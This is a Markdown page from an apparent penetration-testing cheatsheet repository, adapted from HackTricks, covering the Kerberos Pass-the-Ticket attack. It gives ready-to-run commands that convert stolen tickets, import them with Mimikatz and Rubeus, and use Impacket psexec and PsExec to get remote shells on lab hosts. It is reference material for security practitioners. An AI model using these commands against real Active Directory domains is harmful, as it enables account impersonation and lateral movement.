daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pass-the-ticket.md (3429B)


      1 ---
      2 title: "Pass the Ticket"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/pass-the-ticket.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/pass-the-ticket.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Pass the Ticket
     14 
     15 ## Overview
     16 
     17 In a Pass-the-Ticket (PtT) attack, an adversary uses a stolen Kerberos ticket to authenticate as the ticket's principal without possessing that account's password. A ticket-granting ticket (TGT) can be used to request service tickets, while a stolen service ticket is limited to its target service and validity period.<sup>[[1]](#references)</sup>
     18 
     19 For ticket acquisition techniques, see:
     20 
     21 - [Harvesting tickets from Windows](/hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows)
     22 - [Harvesting tickets from Linux](/hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux)
     23 
     24 ## Converting Linux and Windows Ticket Formats
     25 
     26 Kerberos caches commonly appear as MIT `ccache` files on Linux and `.kirbi` files on Windows. `ticket_converter` converts between these formats using an input ticket and output path.<sup>[[2]](#references)</sup>
     27 
     28 ```bash
     29 python ticket_converter.py velociraptor.ccache velociraptor.kirbi
     30 # Expected message: Converting ccache => kirbi
     31 python ticket_converter.py velociraptor.kirbi velociraptor.ccache
     32 # Expected message: Converting kirbi => ccache
     33 ```
     34 
     35 Kekeo also provides Kerberos ticket tooling on Windows.<sup>[[3]](#references)</sup>
     36 
     37 ## Using a Ticket
     38 
     39 On Linux, point `KRB5CCNAME` to the cache and instruct an Impacket client to use Kerberos without prompting for a password:<sup>[[4]](#references)</sup>
     40 
     41 ```bash
     42 export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
     43 python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass
     44 ```
     45 
     46 On Windows, Mimikatz or Rubeus can import a `.kirbi` ticket into the current logon session. Use `klist` to inspect the resulting cache.<sup>[[5]](#references)[[6]](#references)</sup>
     47 
     48 ```powershell
     49 mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
     50 .\Rubeus.exe ptt /ticket:'[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi'
     51 klist
     52 .\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
     53 ```
     54 
     55 Ticket import does not grant privileges beyond those represented by the ticket and the target service's authorization policy. Expired, revoked, malformed, or incorrectly scoped tickets may fail.<sup>[[1]](#references)</sup>
     56 
     57 For broader Kerberos attack context and related ticket-acquisition techniques, see Tarlogic's Kerberos attack guide.<sup>[[7]](#references)</sup>
     58 
     59 ## References
     60 
     61 - [1] [MITRE ATT&CK T1550.003 - Pass the Ticket](https://attack.mitre.org/techniques/T1550/003/)
     62 - [2] [Zer1t0 - `ticket_converter`](https://github.com/Zer1t0/ticket_converter)
     63 - [3] [gentilkiwi - Kekeo](https://github.com/gentilkiwi/kekeo)
     64 - [4] [Fortra - Impacket examples](https://github.com/fortra/impacket/tree/master/examples)
     65 - [5] [gentilkiwi - Mimikatz](https://github.com/gentilkiwi/mimikatz)
     66 - [6] [GhostPack - Rubeus](https://github.com/GhostPack/Rubeus)
     67 - [7] [Tarlogic - Kerberos attack techniques](https://www.tarlogic.com/blog/how-to-attack-kerberos/)